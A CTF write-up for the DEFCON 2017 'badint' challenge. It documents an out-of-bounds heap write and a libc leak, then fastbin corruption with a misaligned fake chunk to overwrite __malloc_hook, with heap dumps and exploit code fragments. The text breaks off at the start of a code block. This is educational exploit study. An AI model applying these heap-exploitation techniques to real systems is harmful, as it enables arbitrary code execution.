DEFCON CTF 2017 Qualifier - badint

Enjoy some badint at badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me:21813

Attachment: badint libc.so xpl.py

Team: Samurai

SEQ #: 0
Offset: 0
Data: AAAABBBB
LSF Yes/No: No
RX PDU [0] [len=4]
SEQ #: 0
Offset: 4
Data: CCCCDDDD
LSF Yes/No: Yes
RX PDU [0] [len=4]
Assembled [seq: 0]: aaaabbbbccccdddd

By playing around with the service, it quickly becomes clear that we can define several data chunks, which get put together as soon as we answer LSF with Yes.

Assembling them will create a new chunk and copy the previously defined chunks at the specified offsets into it.

SEQ #: 0
Offset: 0
Data: AAAABBBB
LSF Yes/No: No
RX PDU [0] [len=4]
SEQ #: 0
Offset: 8
Data: CCCCDDDD
LSF Yes/No: No
RX PDU [0] [len=4]
SEQ #: 0
Offset: 12
Data: EEEEFFFF
LSF Yes/No: Yes
RX PDU [0] [len=4]
Assembled [seq: 0]: aaaabbbb00000000ccccdddd

The binary itself contains quite a lot of functions. Luckily, after getting a rough idea of how the chunks are allocated and filled, I took a break from reversing and started playing around with the heap instead. In the end this worked out pretty well, since the challenge was all about heap corruption.

Stripped pseudo-code:

void inputHandler()
{  
  	while (true)
  	{
    	printf("SEQ #: ");
    	fgets(&s, 255, stdin);      
    	seqNo = atol(&s);    
    
    	printf("Offset: ");
    	fgets(&s, 255, stdin);      
    	offset = atol(&s);
    
    	printf("Data: ", 255LL);
    	fgets(&s, 768, stdin);
    
    	inputChunk = (void *)createDataChunk(&s, &v9, &v9);

		printf("LSF Yes/No: ", &v9);
		fgets(&s, 768, stdin);

		if (s == "Yes")
			assembleChunks = 1;
		else
			assembleChunks = 0;
 
		printf("RX PDU [%d] [len=%d]\n", seqNo, v9);
		createPDUChunk(*(&qword_604100 + seqNo), offset, inputChunk, v9);
		
		delete(inputChunk);

		if ( assembleChunks )
		{
	  		finalChunk = assemblePDUs(*(&qword_604100 + seqNo), &v8, &v8);
	  		
	  		printf("Assembled [seq: %u]: ", seqNo);

	  		for ( i = 0; i < v8; ++i )
	    		printf("%02x", *((_BYTE *)finalChunk + i));

	  		puts("\n");

	  		delete(finalChunk);
		}    
  	}  	
}

So, when we specify a data chunk, the binary creates an input chunk and hex-decodes our input into it (the text AAAABBBB becomes the bytes aa aa bb bb). Then it creates a copy of that chunk (the data chunk) and a PDU chunk, which contains the meta-information for this part of the sequence (offset, pointer to data, …). After creating the PDU chunk, the initial input chunk gets freed.
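The conversion of the Data line into raw bytes, and the byte order seen in the heap dumps further down, can be reproduced with a short Python 3 sketch. It assumes the service does nothing more than turn pairs of hex digits into bytes (inferred from the transcripts, not from the disassembly); `decode_data` and `as_qwords` are hypothetical helper names.

```python
import struct

def decode_data(line: str) -> bytes:
    """Turn the hex text of a Data line into raw bytes (assumed behaviour)."""
    return bytes.fromhex(line)

def as_qwords(raw: bytes) -> list:
    """View raw bytes as little-endian 64-bit words, like a gdb x/gx dump."""
    padded = raw + b"\x00" * (-len(raw) % 8)
    return [hex(q) for q in struct.unpack("<%dQ" % (len(padded) // 8), padded)]

raw = decode_data("AAAABBBBCCCCDDDDEEEEFFFF")
print(len(raw))          # 12, the "len" reported by RX PDU
print(as_qwords(raw))    # ['0xddddccccbbbbaaaa', '0xffffeeee']
```

The two words are the same values that show up in the data chunk of the heap dump for this input.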

If we answer LSF with “Yes”, it creates a final chunk and copies the previously entered data into it at the corresponding offsets. However, it never checks whether the specified offset lies inside the boundaries of this chunk.

This gives us the possibility to overwrite arbitrary values behind the chunk on the heap!
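A toy model of the assembly step makes the bug easier to see. It assumes, based only on the transcripts above, that the final chunk is sized as the sum of all fragment lengths while every fragment is copied to its own offset without a bounds check. The bytearray stands in for heap memory, and all names are illustrative rather than taken from the binary.

```python
def assemble(heap: bytearray, chunk_start: int, fragments):
    """Copy (offset, data) fragments into a 'final chunk' inside heap.

    Assumed behaviour: chunk size = sum of fragment lengths, and offsets
    are never checked against that size.
    Returns (printed_bytes, size).
    """
    size = sum(len(data) for _, data in fragments)
    for offset, data in fragments:
        dst = chunk_start + offset          # no check that offset + len <= size
        heap[dst:dst + len(data)] = data
    return bytes(heap[chunk_start:chunk_start + size]), size

heap = bytearray(64)                         # zeroed stand-in for the heap
frags = [(0, bytes.fromhex("AAAABBBB")),
         (8, bytes.fromhex("CCCCDDDD")),
         (12, bytes.fromhex("EEEEFFFF"))]
out, size = assemble(heap, 0, frags)
print(out.hex())              # aaaabbbb00000000ccccdddd
print(heap[12:16].hex())      # eeeeffff, written past the 12-byte chunk
```

The printed output matches the second transcript: only 12 bytes are shown, while the third fragment has already been written behind the chunk.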

Let’s verify this:

SEQ #: 0
Offset: 0
Data: AAAABBBBCCCCDDDDEEEEFFFF
LSF Yes/No: No
RX PDU [0] [len=12]

Heap:

0x61a000:	0x0000000000000000	0x0000000000000000
0x61a010:	0x0000000000000000	0x0000000000000000
0x61a020:	0x0000000000000000	0x0000000000000021
0x61a030:	0x0000000000000000	0x00000000ffffeeee	<-- Input Chunk / Final chunk
0x61a040:	0x0000000000000000	0x0000000000000031
0x61a050:	0x0000000000000000	0x0000000000000000	<-- PDU Chunk
0x61a060:	0x0000000000616c28	0x00000000000c0000
0x61a070:	0x000000000061a080	0x0000000000000021
0x61a080:	0xddddccccbbbbaaaa	0x00000000ffffeeee	<-- Data Chunk
0x61a090:	0x0000000000000000	0x000000000001cf71
0x61a0a0:	0x0000000000000000	0x0000000000000000
0x61a0b0:	0x0000000000000000	0x0000000000000000

For a quick PoC, we’ll just overwrite 0x61a090, which is at offset 96 (0x61a090 - 0x61a030) relative to our input chunk. The freed input chunk will be reused as the final chunk on assembly, since it gets freed before the final chunk is allocated and both have the same size.
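The offset is plain pointer arithmetic on the addresses from the dump above. A minimal sketch (the helper name is made up for illustration):

```python
def assembly_offset(target: int, final_chunk_data: int) -> int:
    """Offset to send so that a fragment lands exactly on target."""
    if target < final_chunk_data:
        # Only memory behind the final chunk is considered in this writeup.
        raise ValueError("target lies in front of the final chunk")
    return target - final_chunk_data

offset = assembly_offset(0x61a090, 0x61a030)
print(offset, hex(offset))   # 96 0x60
```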

SEQ #: 0
Offset: 0
Data: AAAABBBBCCCCDDDDEEEEFFFF
LSF Yes/No: No
RX PDU [0] [len=12]
SEQ #: 0
Offset: 96
Data: AAAABBBBCCCCDDDD
LSF Yes/No: Yes
RX PDU [0] [len=8]
Assembled [seq: 0]: aaaabbbbccccddddeeeeffff0000000000000000

Heap:

0x61a000:	0x0000000000000000	0x0000000000000000
0x61a010:	0x0000000000000000	0x0000000000000000
0x61a020:	0x0000000000000000	0x0000000000000021
0x61a030:	0x0000000000000000	0x00000000ffffeeee	<-- Input Chunk
0x61a040:	0x0000000000000000	0x0000000000000031	
0x61a050:	0x000000000061a090	0x0000000000000000	<-- PDU Chunk
0x61a060:	0x0000000000000000	0x00000000000c0000
0x61a070:	0x000000000061a080	0x0000000000000021
0x61a080:	0xddddccccbbbbaaaa	0x00000000ffffeeee	<-- Data Chunk
0x61a090:	0xddddccccbbbbaaaa	0x0000000000000031	<-- Overwritten
0x61a0a0:	0x0000000000000000	0x000000000061a050
0x61a0b0:	0x0000000000000000	0x0000000000080060
0x61a0c0:	0x000000000061a0d0	0x0000000000000021
0x61a0d0:	0xddddccccbbbbaaaa	0x0000000000000000
0x61a0e0:	0x0000000000000000	0x000000000001cf21
0x61a0f0:	0x0000000000000000	0x0000000000000000
0x61a100:	0x0000000000000000	0x0000000000000000

So, we have an (almost) arbitrary write on the heap. Since badint allocates and frees a lot of fastbins, fastbin corruption shouldn’t be hard to achieve.

Leaking libc

The behaviour of the chunk assembly also introduces a use-after-free style information leak: the final chunk isn’t zeroed out on creation. Thus, we can define multiple data chunks at the same offset (increasing the size of the final chunk) while leaving other parts of it uninitialized (thanks to ebeip90 and nilch for pointing that out).

# First sequence

SEQ #: 0
Offset: 0
Data: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
LSF Yes/No: Yes
RX PDU [0] [len=24]
Assembled [seq: 0]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

# New sequence

SEQ #: 0
Offset: 12
Data: BBBBBBBBBBBBBBBB
LSF Yes/No: No
RX PDU [0] [len=8]
SEQ #: 0
Offset: 12
Data: BBBBBBBBBBBBBBBB
LSF Yes/No: Yes
RX PDU [0] [len=8]
Assembled [seq: 0]: 0000000000000000aaaaaaaabbbbbbbb	<-- Those a's are remains from the first sequence

We can use that to obtain a libc address. We just need to create a data chunk whose size is larger than the maximum fastbin size. When the input chunk gets freed, its FD/BK pointers get populated with pointers into main_arena. Again, since the input chunk gets freed before the final chunk is allocated, the final chunk will occupy the same memory area.

With an appropriate offset, we’ll be able to leak the FD pointer.
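To see which request sizes stay out of the fastbins, here is a rough sketch of glibc's size rounding on x86-64. It assumes the default fastbin limit of 0x80 bytes of chunk size (the default for glibc versions of that era; the exact libc version of the target is an assumption here).

```python
SIZE_SZ = 8                 # sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 0xF     # chunks are 16-byte aligned
MIN_CHUNK_SIZE = 0x20
MAX_FAST_DEFAULT = 0x80     # assumed default fastbin limit on 64-bit

def request2size(req: int) -> int:
    """Chunk size malloc uses for a request of req bytes."""
    size = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MIN_CHUNK_SIZE)

def is_fastbin(req: int) -> bool:
    """True if a freed chunk for this request would go to a fastbin."""
    return request2size(req) <= MAX_FAST_DEFAULT

for req in (12, 0x60, 0x80):
    print(hex(req), hex(request2size(req)), is_fastbin(req))
# 0xc 0x20 True
# 0x60 0x70 True
# 0x80 0x90 False
```

The chunk sizes agree with the size fields in the heap dumps (0x21, 0x71 and 0x91 once the PREV_INUSE bit is set), so 0x80 bytes of data are just enough to end up in the unsorted bin.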

...

def sendSeq(seq, offset, data, lsf, rec=True):
	r.sendlineafter(":", str(seq))
	r.sendlineafter("Offset:", str(offset))
	r.sendlineafter("Data:", data)
	
	if (rec):
		r.recvuntil(":")
		if lsf:
			r.sendline("Yes")
		else:
			r.sendline("No")

def exploit():
	log.info("Leak LIBC base")

	sendSeq(0, 8, ('B'*0x80).encode("hex"), True)	
	
	data = r.recvuntil("0000").split(":")[2].strip()
	
	LEAK = u64(data.decode("hex"))	
	LIBC = LEAK - 0x3be7b8

This might be too verbose, but watching the heap while the chunks get assembled should make it easier to understand what’s happening.

At first, the input chunk will be created, and our input gets stored there:

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091	<- Input chunk
0x61ac30:	0x4242424242424242	0x4242424242424242	
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000000	0x000000000001c351

After this, it will create the PDU chunk on the heap, and copy the input chunk into a new data chunk:

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091	<- Input chunk
0x61ac30:	0x4242424242424242	0x4242424242424242	
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000000	0x0000000000000031	<- PDU chunk
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000616c28	0x0000000000800008
0x61ace0:	0x000000000061acf0	0x0000000000000091	<- Data chunk
0x61acf0:	0x4242424242424242	0x4242424242424242	
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

It then frees the input chunk. Since the chunk is too large for a fastbin, it is put into the unsorted bin and its FD/BK are populated with pointers into main_arena:

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091
0x61ac30:	0x00007ffff7636b58	0x00007ffff7636b58	<- FD/BK populated
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000090	0x0000000000000030  
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000616c28	0x0000000000800008
0x61ace0:	0x000000000061acf0	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

Since we chose to assemble the sequence immediately, it now allocates the final chunk, and malloc serves us the previous input chunk for that. The assembly function then copies our input from the data pointer to offset 8 in the final chunk, leaving FD untouched.

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091
0x61ac30:	0x00007ffff7636b58	0x4242424242424242	<- Final chunk
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x4242424242424242	0x0000000000000031	<- Overwriting prev size
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000800008
0x61ace0:	0x000000000061acf0	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

Assembled [seq: 0]: 586b63f7ff7f0000424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242\n
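Turning that output into an address only takes the first eight bytes, read as a little-endian pointer. The sketch below is Python 3 without pwntools; `parse_leak` is a hypothetical helper, and the remote values are the ones printed in the exploit log at the end of this writeup.

```python
import struct

def parse_leak(assembled_hex: str) -> int:
    """First 8 bytes of the assembled output as a little-endian pointer."""
    return struct.unpack("<Q", bytes.fromhex(assembled_hex[:16]))[0]

# Local run from the dump above: matches the FD value 0x00007ffff7636b58.
local_leak = parse_leak("586b63f7ff7f0000" + "42" * 0x78)
print(hex(local_leak))                      # 0x7ffff7636b58

# Remote run: the offset 0x3be7b8 is specific to the provided libc.so.
LEAK_OFFSET = 0x3be7b8
remote_leak = 0x7f2a6a94d7b8                # value from the exploit log
remote_base = remote_leak - LEAK_OFFSET
print(hex(remote_base))                     # 0x7f2a6a58f000
```

A page-aligned result is a quick sanity check that the offset fits the libc in use.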

Now that we have the base address of libc, we can start with corrupting the heap in order to get code execution.

Fastbin corruption

The idea behind fastbin corruption is to overwrite the FD pointer of a freed fastbin chunk with an address of our choice. When this chunk gets allocated again, malloc puts our fake address at the head of the fastbin list. This misleads malloc into thinking that there’s another freed chunk at this address, which it will hand out on a following allocation (as long as the fake chunk at this address fulfills some restrictions, that is).

If we succeed in tricking malloc into treating our fake address as a valid chunk, we can use this chunk to write to that address. I used this to overwrite __malloc_hook, which malloc calls when allocating new chunks, thus calling our injected address.
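The list mechanics can be shown with a deliberately simplified model of a single fastbin. It ignores the size check malloc performs, and the class and addresses are purely illustrative.

```python
class ToyFastbin:
    """Single fastbin modelled as a LIFO list linked through fd pointers."""

    def __init__(self):
        self.head = 0          # 0 means the bin is empty
        self.fd = {}           # chunk address -> fd value stored in that chunk

    def free(self, chunk: int) -> None:
        self.fd[chunk] = self.head
        self.head = chunk

    def malloc(self) -> int:
        chunk = self.head
        # Whatever is stored as fd becomes the new list head, valid or not.
        self.head = self.fd.get(chunk, 0)
        return chunk

fastbin = ToyFastbin()
fastbin.free(0x1000)                # a legitimately freed chunk
fastbin.fd[0x1000] = 0x41414141     # attacker overwrites its fd
first = fastbin.malloc()            # returns the real chunk
second = fastbin.malloc()           # returns the attacker's address
print(hex(first), hex(second))      # 0x1000 0x41414141
```

Two allocations are needed: the first one consumes the corrupted chunk, the second one returns the attacker-chosen address.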

Overwriting __malloc_hook is a little bit tricky, though, since we don’t control the data around it. Just passing the address of __malloc_hook into the fastbin list will fail, since there is no valid size field in front of it.

But we can get around this by misaligning our chunk (uafio showed this in BabyHeap2017).

When allocating from a fastbin, malloc checks that the size field of the returned chunk matches the index of the fastbin it came from.

0x7fbd777d5720 <__memalign_hook>:   0x00007fbd7749ac90	0x0000000000000000	
0x7fbd777d5730 <__realloc_hook>:    0x00007fbd7749ac30	0x0000000000000000	<- prev size / size
0x7fbd777d5740 <__malloc_hook>:     0x0000000000000000	0x0000000000000000	<- target

If we just passed the address of __malloc_hook for our fake chunk, malloc would interpret the value at 0x7fbd777d5738 (0x0) as the chunk size, which makes the check fail.

0x7fbd777d572d:	0xbd7749ac30000000	0x000000000000007f	<- Misaligned realloc hook / Fake size (now in fastbin size range)
0x7fbd777d573d:	0x0000000000000000	0x0000000000000000	<- __malloc_hook
0x7fbd777d574d:	0x0000000000000000	0x0000000000000000
0x7fbd777d575d:	0x0000000000000000	0x00006a0000000000

But by misaligning the address to 0x7fbd777d572d, malloc interprets 0x7f as the size, so the check passes and the memory gets handed out as a fastbin chunk.
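The effect of the misalignment can be replayed on the bytes from the first dump above. This is a sketch in Python 3; `size_field` is a hypothetical helper, while `fastbin_index` mirrors the 64-bit formula glibc uses, `(size >> 4) - 2`.

```python
import struct

BASE = 0x7fbd777d5720                          # address of __memalign_hook
memory = struct.pack("<6Q",
                     0x00007fbd7749ac90, 0,    # __memalign_hook
                     0x00007fbd7749ac30, 0,    # __realloc_hook
                     0, 0)                     # __malloc_hook

def size_field(chunk: int) -> int:
    """Read the size field (second qword) of a chunk starting at chunk."""
    return struct.unpack_from("<Q", memory, chunk + 8 - BASE)[0]

def fastbin_index(size: int) -> int:
    """Fastbin index on 64-bit; the shift drops the low flag bits."""
    return (size >> 4) - 2

aligned = 0x7fbd777d5730
misaligned = 0x7fbd777d572d
print(hex(size_field(aligned)))                # 0x0
print(hex(size_field(misaligned)))             # 0x7f
print(fastbin_index(size_field(misaligned)))   # 5
print(fastbin_index(0x71))                     # 5
```

Both 0x7f and 0x71 map to index 5, so the fake chunk has to be placed into the list that serves 0x70-sized chunks, which is why the later payloads are padded to 0x60 bytes.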

Exploiting it

So much for the theory. Let’s see how all this can be applied to the challenge service.

First, we need to prepare an appropriate heap layout. Since we can only overwrite values behind the final chunk, we have to make sure that the freed fastbin chunk whose FD we want to overwrite is positioned behind it.

To ensure this, I first created a smaller chunk (size 0x16) and then a bigger chunk (size 0x60):

log.info("Create fastbin chunks and free them to populate fastbin list")
	
sendSeq(0, 0, "A"*0x16*2, True)	
sendSeq(0, 0, "B"*0x60*2, True)

Heap after first sequence

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000021	<- Input/Final buffer of first seq
0x61ac30:	0x0000000000000000	0xaaaaaaaaaaaaaaaa	
0x61ac40:	0x4242aaaaaaaaaaaa	0x0000000000000021
0x61ac50:	0xaaaaaaaaaaaaaaaa	0xaaaaaaaaaaaaaaaa	<- Data buffer
0x61ac60:	0x4242aaaaaaaaaaaa	0x0000000000000051	
0x61ac70:	0x00007ffff7636b58	0x00007ffff7636b58	<- Remains from LIBC leak
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000050	0x0000000000000030	<- PDU chunk
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000160000
0x61ace0:	0x000000000061ac50	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242	<- Remains from LIBC leak
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

Heap after second sequence

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000021	<- Input/Final buffer of first seq (small chunk)
0x61ac30:	0x0000000000000000	0xaaaaaaaaaaaaaaaa	
0x61ac40:	0x4242aaaaaaaaaaaa	0x0000000000000021	
0x61ac50:	0xaaaaaaaaaaaaaaaa	0xaaaaaaaaaaaaaaaa	<- Data chunk (first seq)
0x61ac60:	0x4242aaaaaaaaaaaa	0x0000000000000051
0x61ac70:	0x00007ffff7636b98	0x00007ffff7636b98	<- Remains from LIBC leak
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000050	0x0000000000000030	<- PDU chunk (second seq)
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000600000
0x61ace0:	0x000000000061adf0	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242	<- Remains from LIBC leak
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x0000000000000071	<- Final chunk of second seq (big chunk)
0x61ad80:	0x0000000000000000	0xbbbbbbbbbbbbbbbb	<- FD (0x0) of final chunk
0x61ad90:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ada0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adb0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adc0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61add0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ade0:	0x0000000000000000	0x0000000000000071	<- Data chunk (second seq)
0x61adf0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae00:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae10:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae20:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae30:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae40:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae50:	0x0000000000000000	0x000000000001c1b1

$ p main_arena
$15 = {
  mutex = 0x0, 
  flags = 0x0, 
  fastbinsY = {0x61ac20, 0x61acb0, 0x0, 0x0, 0x0, 0x61ad70, 0x0, 0x0, 0x0, 0x0}, 
  top = 0x61ae50, 
  last_remainder = 0x61ac60,

The final chunk for the second sequence was allocated at 0x61ad70 and then freed, so it was put into the fastbin list (see fastbinsY[5]). If we now allocated another chunk of the same size, malloc would give us this chunk again and put its FD pointer (currently 0x0) into the fastbin list. But if we overwrite the FD pointer with the (misaligned) address near __malloc_hook before allocating a new chunk, malloc puts that address into the fastbin list instead. The next allocation of the same size class (0x70) then returns a chunk overlapping __malloc_hook, enabling us to overwrite it with arbitrary data.

So we just have to create a new (small) data chunk with offset 0x150 (0x61ad80 (target) - 0x61ac30 (input buffer for small chunks)) and assemble it. The assembled chunk is created at 0x61ac30 and our data chunk is copied to offset 0x150 from there, thus landing at 0x61ad80 (the FD pointer of the chunk in fastbinsY[5]).

log.info("Overwrite Fastbin FD and get pointer to MALLOC_HOOK into fastbin list")
		
sendSeq(0, 0x150, addr(MALLOC_HOOK), True)
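The `addr()` helper used here is defined in the final exploit as `p64(a).encode("hex")`, which is Python 2 with pwntools. An equivalent sketch in plain Python 3, using the misaligned address from the remote run log as sample input:

```python
import struct

def addr(value: int) -> str:
    """Little-endian 64-bit value as the hex text the Data prompt expects."""
    return struct.pack("<Q", value).hex()

# Misaligned fake-chunk address from the remote run log (LEAK - 0x8b).
fake_chunk_hex = addr(0x7f2a6a94d72d)
print(fake_chunk_hex)               # 2dd7946a2a7f0000

# Offset that places these 8 bytes on the FD pointer at 0x61ad80.
print(hex(0x61ad80 - 0x61ac30))     # 0x150
```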

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000021
0x61ac30:	0x0000000000000000	0xaaaaaaaaaaaaaaaa	<-- Input/Final chunk
0x61ac40:	0x4242aaaaaaaaaaaa	0x0000000000000021
0x61ac50:	0xaaaaaaaaaaaaaaaa	0xaaaaaaaaaaaaaaaa
0x61ac60:	0x4242aaaaaaaaaaaa	0x0000000000000021
0x61ac70:	0x00007ffff7636acd	0x00007ffff7636b98
0x61ac80:	0x4242424242424242	0x0000000000000031
0x61ac90:	0x00007ffff7636b58	0x00007ffff7636b58
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000030	0x0000000000000030
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000080150
0x61ace0:	0x000000000061ac70	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x0000000000000071
0x61ad80:	0x00007ffff7636acd	0xbbbbbbbbbbbbbbbb	<-- FD pointer overwritten
0x61ad90:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ada0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adb0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adc0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61add0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ade0:	0x0000000000000000	0x0000000000000071
0x61adf0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae00:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae10:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae20:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae30:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae40:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae50:	0x0000000000000000	0x000000000001c1b1

The input buffer for the next sequence will now be created at 0x61ad70, stuffing our fake address into fastbin list. Allocating the final chunk will then serve a chunk overlapping __malloc_hook. When the binary assembles our sequence, it will copy our input to that chunk, thus overwriting the hook.

log.info("Allocate chunk to overwrite MALLOC_HOOK")
		
payload = "\x01"*(0x6)
payload += addr(0xdeadbeef)			# malloc_hook
payload += "\x01"*(0x60*2-len(payload))	# pad size

sendSeq(0, 0, payload, False)
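The six padding characters follow from the misalignment: the user data of the fake chunk starts three bytes in front of __malloc_hook, and every decoded byte takes two characters of input. A small sketch using the addresses from the earlier hook dump (the constant names are illustrative):

```python
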